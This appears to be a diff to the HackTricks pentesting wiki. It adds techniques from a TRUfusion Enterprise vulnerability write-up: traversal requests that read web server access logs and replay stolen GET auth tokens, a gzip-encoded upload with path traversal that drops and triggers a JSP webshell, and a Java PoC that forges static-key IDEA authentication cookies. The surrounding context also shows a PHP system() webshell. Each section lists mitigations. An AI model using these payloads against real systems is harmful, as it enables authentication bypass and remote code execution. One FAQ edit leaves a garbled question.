Add content from: When Audits Fail: Four Critical Pre-Auth Vulnerabilities in ...

src/pentesting-web/file-inclusion/README.md

@@ -559,6 +559,36 @@ Other possible log paths:
 
 Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
 
+### Read access logs to harvest GET-based auth tokens (token replay)
+
+Many apps mistakenly accept session/auth tokens via GET (e.g., AuthenticationToken, token, sid). If you have a path traversal/LFI primitive into web server logs, you can steal those tokens from access logs and replay them to fully bypass authentication.
+
+How-to:
+- Use the traversal/LFI to read the web server access log. Common locations:
+  - /var/log/apache2/access.log, /var/log/httpd/access_log
+  - /var/log/nginx/access.log
+- Some endpoints return file reads Base64-encoded. If so, decode locally and inspect the log lines.
+- Grep for GET requests that include a token parameter and capture its value, then replay it against the application entry point.
+
+Example flow (generic):
+
+```http
+GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
+Host: target
+```
+
+Decode the body if it’s Base64, then replay a captured token:
+
+```http
+GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
+Host: target
+```
+
+Notes:
+- Tokens in URLs are logged by default; never accept bearer tokens via GET in production systems.
+- If the app supports multiple token names, search for common keys like AuthenticationToken, token, sid, access_token.
+- Rotate any tokens that may have leaked to logs.
+
 ### Via Email
 
 **Send a mail** to a internal account (user@localhost) containing your PHP payload like `<?php echo system($_REQUEST["cmd"]); ?>` and try to include to the mail of the user with a path like **`/var/mail/<USERNAME>`** or **`/var/spool/mail/<USERNAME>`**
@@ -756,6 +786,8 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 - [VTENEXT 25.02 – a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
 - [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
+- [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
+
 {{#file}}
 EN-Local-File-Inclusion-1.pdf
 {{#endfile}}

src/pentesting-web/file-upload/README.md

@@ -268,6 +268,44 @@ Notes
 - This redirects arbitrary file writes; if the destination executes scripts (PHP/ASP), this becomes RCE.
 - Defenses: don’t allow writable upload roots to be attacker‑controllable under C:\Windows\Tasks or similar; block junction creation; validate extensions server‑side; store uploads on a separate volume or with deny‑execute ACLs.
 
+### GZIP-compressed body upload + path traversal in destination param → JSP webshell RCE (Tomcat)
+
+Some upload/ingest handlers write the raw request body to a filesystem path that is constructed from user-controlled query parameters. If the handler also supports Content-Encoding: gzip and fails to canonicalize/validate the destination path, you can combine directory traversal with a gzipped payload to write arbitrary bytes into a web-served directory and obtain RCE (e.g., drop a JSP under Tomcat’s webapps).
+
+Generic exploitation flow:
+- Prepare your server-side payload (e.g., minimal JSP webshell) and gzip-compress the bytes.
+- Send a POST where a path parameter (e.g., token) contains traversal escaping the intended folder, and file indicates the filename to persist. Set Content-Type: application/octet-stream and Content-Encoding: gzip; the body is the compressed payload.
+- Browse to the written file to trigger execution.
+
+Illustrative request:
+
+```http
+POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
+Host: target
+Content-Type: application/octet-stream
+Content-Encoding: gzip
+Content-Length: <len>
+
+<gzip-compressed-bytes-of-your-jsp>
+```
+
+Then trigger:
+
+```http
+GET /jsp/shell.jsp?cmd=id HTTP/1.1
+Host: target
+```
+
+Notes
+- Target paths vary by install (e.g., /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ in some stacks). Any web-exposed folder that executes JSP will work.
+- Burp Suite’s Hackvertor extension can produce a correct gzip body from your payload.
+- This is a pure pre-auth arbitrary file write → RCE pattern; it does not rely on multipart parsing.
+
+Mitigations
+- Derive upload destinations server-side; never trust path fragments from clients.
+- Canonicalize and enforce that the resolved path stays within an allow-listed base directory.
+- Store uploads on a non-executable volume and deny script execution from writable paths.
+
 ## Tools
 
 - [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
@@ -439,6 +477,8 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 
 ## References
 
+- [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
+
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
 - [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
 - [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)

src/pentesting-web/hacking-with-cookies/README.md

@@ -390,8 +390,82 @@ Create a user called for example "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
 There should be a pattern (with the size of a used block). So, knowing how are a bunch of "a" encrypted you can create a username: "a"\*(size of the block)+"admin". Then, you could delete the encrypted pattern of a block of "a" from the cookie. And you will have the cookie of the username "admin".
 
+### Static-key cookie forgery (symmetric encryption of predictable IDs)
+
+Pattern
+- Some applications mint authentication cookies by encrypting only a predictable value (e.g., the numeric user ID) under a global, hard-coded symmetric key, then encoding the ciphertext (hex/base64). If the key is static per product (or per install), anyone can forge cookies for arbitrary users offline and bypass authentication.
+
+How to test/forge
+- Identify the cookie(s) that gate auth, e.g., COOKIEID and ADMINCOOKIEID.
+- Determine cipher/encoding. In one real-world case the app used IDEA with a constant 16-byte key and returned the ciphertext as hex.
+- Verify by encrypting your own user ID and comparing with the issued cookie. If it matches, you can mint cookies for any target ID (1 often maps to the first admin).
+- Set the forged value directly as the cookie and browse; no credentials are needed.
+
+Minimal Java PoC (IDEA + hex) used in the wild
+
+<details>
+<summary>Click to expand</summary>
+
+```java
+import cryptix.provider.cipher.IDEA;
+import cryptix.provider.key.IDEAKeyGenerator;
+import cryptix.util.core.Hex;
+import java.security.Key;
+import java.security.KeyException;
+import java.io.UnsupportedEncodingException;
+
+public class App {
+    private String ideaKey = "1234567890123456"; // example static key
+
+    public String encode(char[] plainArray) { return encode(new String(plainArray)); }
+
+    public String encode(String plain) {
+        IDEAKeyGenerator keygen = new IDEAKeyGenerator();
+        IDEA encrypt = new IDEA();
+        Key key;
+        try {
+            key = keygen.generateKey(this.ideaKey.getBytes());
+            encrypt.initEncrypt(key);
+        } catch (KeyException e) { return null; }
+        if (plain.length() == 0 || plain.length() % encrypt.getInputBlockSize() > 0) {
+            for (int currentPad = plain.length() % encrypt.getInputBlockSize(); currentPad < encrypt.getInputBlockSize(); currentPad++) {
+                plain = plain + " "; // space padding
+            }
+        }
+        byte[] encrypted = encrypt.update(plain.getBytes());
+        return Hex.toString(encrypted); // cookie expects hex
+    }
+
+    public String decode(String chiffre) {
+        IDEAKeyGenerator keygen = new IDEAKeyGenerator();
+        IDEA decrypt = new IDEA();
+        Key key;
+        try {
+            key = keygen.generateKey(this.ideaKey.getBytes());
+            decrypt.initDecrypt(key);
+        } catch (KeyException e) { return null; }
+        byte[] decrypted = decrypt.update(Hex.fromString(chiffre));
+        try { return new String(decrypted, "ISO_8859-1").trim(); } catch (UnsupportedEncodingException e) { return null; }
+    }
+
+    public void setKey(String key) { this.ideaKey = key; }
+}
+```
+
+</details>
+
+Example ciphertexts (hex) for numeric user IDs in such a scheme
+- userID 1 → FEF2DF1C36FFF2E3
+- userID 2 → 94A0D199D8B822AB
+
+Defenses
+- Never use a static global key. Use per-environment managed secrets with rotation.
+- Do not treat an encrypted ID as an authenticator. Use signed tokens (e.g., HMAC/AEAD) with non-predictable claims and include integrity protection over expiry, issuer, audience, and context.
+- Bind cookies to additional context (e.g., server-side session with random ID, or add anti-replay properties).
+
 ## References
 
+- [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
 - [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/)
 - [https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd](https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd)
 - [https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)

src/welcome/hacktricks-values-and-faq.md

@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
 
 > [!TIP]
 >
-> - **How can I cite a page of HackTricks?**
+> - **How can I  a page of HackTricks?**
 
 As long as the link **of** the page(s) where you took the information from appears it's enough.\
 If you need a bibtex you can use something like:
@@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
 
 {{#include ../banners/hacktricks-training.md}}
 
-